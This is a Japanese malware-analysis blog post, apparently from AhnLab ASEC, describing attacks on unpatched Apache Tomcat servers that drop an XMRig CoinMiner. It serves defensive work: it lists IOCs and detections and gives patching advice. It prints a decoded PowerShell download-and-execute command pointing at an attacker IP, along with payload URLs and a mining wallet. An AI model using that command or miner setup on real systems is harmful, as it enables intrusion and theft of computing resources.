脆弱な Apache Tomcat Web サーバーをターゲットにインストールされる CoinMiner マルウェア

ASEC 分析チームでは最近、脆弱な Apache Tomcat Web サーバーをターゲットとする攻撃を確認した。最新のアップデートが適用されていない Tomcat サーバーは代表的な脆弱性攻撃のベクトルの一つである。過去にも ASEC ブログにおいて脆弱な JBoss バージョンがインストールされた Apache Tomcat サーバーを狙った攻撃を取り上げたことがある。攻撃者は脆弱性攻撃ツールである JexBoss を利用して Web シェルをインストールしたあと、Meterpreter マルウェアにより感染先システムの操作権限を獲得している。

一般的に攻撃者たちはスキャンの結果で脆弱なバージョンを持つ Web サーバーが確認されると、バージョンに応じた脆弱性を利用して Web シェルをインストールするか、悪意を持ったコマンドを実行する。参考に、IIS Windows Web サーバーでは w3wp.exe プロセスにより攻撃者のコマンドが実行され、Apache Tomcat Web サーバーでは tomca7.exe、tomcat9.exe のようなプロセスがこれを担う。IIS Web サーバーに対する攻撃事例は、過去の以下 ASEC ブログで取り上げたことがある。

攻撃者が使用した具体的な攻撃方式は確認されていないが、当社 ASD(AhnLab Smart Defense)のログによると、感染先システムで PowerShell コマンドが実行されたことが確認できる。

[図1] Tomcat のプロセスが PowerShell コマンドを実行する ASD ログ – 1

Tomcat のプロセスにより実行された PowerShell コマンドは以下のように Base64 でエンコードされており、復号化によって以下のように PowerShell コマンドをダウンロードして実行する、ダウンローダーコマンドであることがわかる。

[図2] Tomcat のプロセスが PowerShell コマンドを実行する ASD ログ – 2

復号化された PowerShell コマンド

IEX (New-Object System.Net.Webclient).DownloadString(‘hxxp://61.103[.]177.229:8000/css/ta.txt’)

ダウンロードして実行される PowerShell スクリプトはまず、持続性を維持するために以下のように現在 SYSTEM 権限を所有しているかどうかに応じて WMI イベントのモニタリング方式、またはタスクスケジューラに PowerShell コマンドを登録する。

[図3] 持続性維持のための PowerShell コマンド

PowerShell コマンドはすべて類似しているが、それぞれ以下のような Pastebin のアドレスからスクリプトをダウンロードして実行している。現在は当該アドレスに正常な PowerShell のアドレスが存在せず持続性の維持は不可能だが、以前には以下で取り上げるマルウェアと同様、CoinMiner をインストールしていたものと推定される。

  • – hxxps://pastebin[.]com/raw/3a9iMmp5
  • – hxxps://pastebin[.]com/raw/H4vnbNqe

以降、外部から XMRig CoinMiner および設定ファイルをダウンロードしてインストールする。このほかにも特定のサービスおよびタスクスケジューラを終了するルーティンが存在するが、これは他の攻撃者によってインストールされている可能性もある、CoinMiner マルウェアと推定される。

[図4] CoinMiner マルウェアのインストールルーティン
[図5] config.json 設定ファイル
  • Mining Pool アドレス : “pool.supportxmr[.]com:80”
  • User : “4AjC6NFWZvQNhPrHYDBbwhFzqjwEcwVzZLLfb4s66X4r1WTFePbX85B88sw6fFPK38QxLewd2c1W9UJzgoSe6v3o3WGtuVD”
  • Pass : “x”

参考に、CoinMiner マルウェアがアップロードされているアドレスも韓国国内の企業と推定される。アクセスすると以下のようなカスタマーサポート/ビリングシステムのログインページを確認できるが、このシステムも攻撃者により侵害を受けてマルウェアがアップロードされたものと見られる。

[図6] CoinMiner がアップロードされた感染システム

当該アドレスから配布されるマルウェアの中には RAR SFX 実行ファイルも存在するが、内部には XMRig と config.json が存在し、同じマイニングプールアドレスおよび攻撃者のアカウントが使用されたものと推定した場合、過去 Pastebin にアップロードされた PowerShell スクリプトがインストールするマルウェアであると推定される。

[図7] RAR SFX マルウェアにより生成される VBS マルウェア

管理者はデフォルトとして設定しているアカウント情報を変更する必要があり、サーバー構成環境が脆弱である場合は最新バージョンのパッチを適用し、既知の脆弱性による被害を事前に防止しなければならない。そして、外部に開放されているサーバーの場合、セキュリティ製品を利用して、部外者からのアクセスを制限する必要がある。また、V3 を最新バージョンにアップデートしてマルウェアへの感染を事前に遮断できるように注意を払わなければならない。

AhnLab V3 製品では、これらのマルウェアに対して以下の通り検知している。

[ファイル検知]
– Downloader/PowerShell.Generic (2022.10.19.03)
– Win-Trojan/Miner3.Exp (2020.01.23.00)
– CoinMiner/Script.Agent (2022.10.19.03)
– Dropper/Win.Miner.C5283988 (2022.10.19.03)
– Trojan/VBS.Runner.SC184041 (2022.10.19.03)

[ビヘイビア検知]
– Execution/MDP.Powershell.M2514

[IOC]
MD5

– 12799b5f179c7d84122a79fc2d4e2629 : PowerShell スクリプト
– 1925ba565905e6b0e6c2b2f55f9fee96 : XMRig CoinMiner
– 606ce310d75ee688cbffaeae33ab4fee : XMRig CoinMiner
– a969e99ce36946d7fbece73f874b4e7d : config.json
– 627d3815c9faf693d89cf1361706a856 : config.json
– 4346850f1794c621d06f08e58f530365 : CoinMiner ドロッパーマルウェア
– 1650d7d352a8cd12bf598f71e9daf98b : VBS マルウェア

ダウンロードアドレス
– hxxp://61.103.177[.]229:8000/css/ta.txt
– hxxp://61.103.177[.]229:8000/js/xmrig.exe
– hxxp://61.103.177[.]229:8000/css/config.json
– hxxps://pastebin[.]com/raw/H4vnbNqe
– hxxps://pastebin[.]com/raw/3a9iMmp5

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

0 0 votes
評価する
guest

0 コメント
Inline Feedbacks
View all comments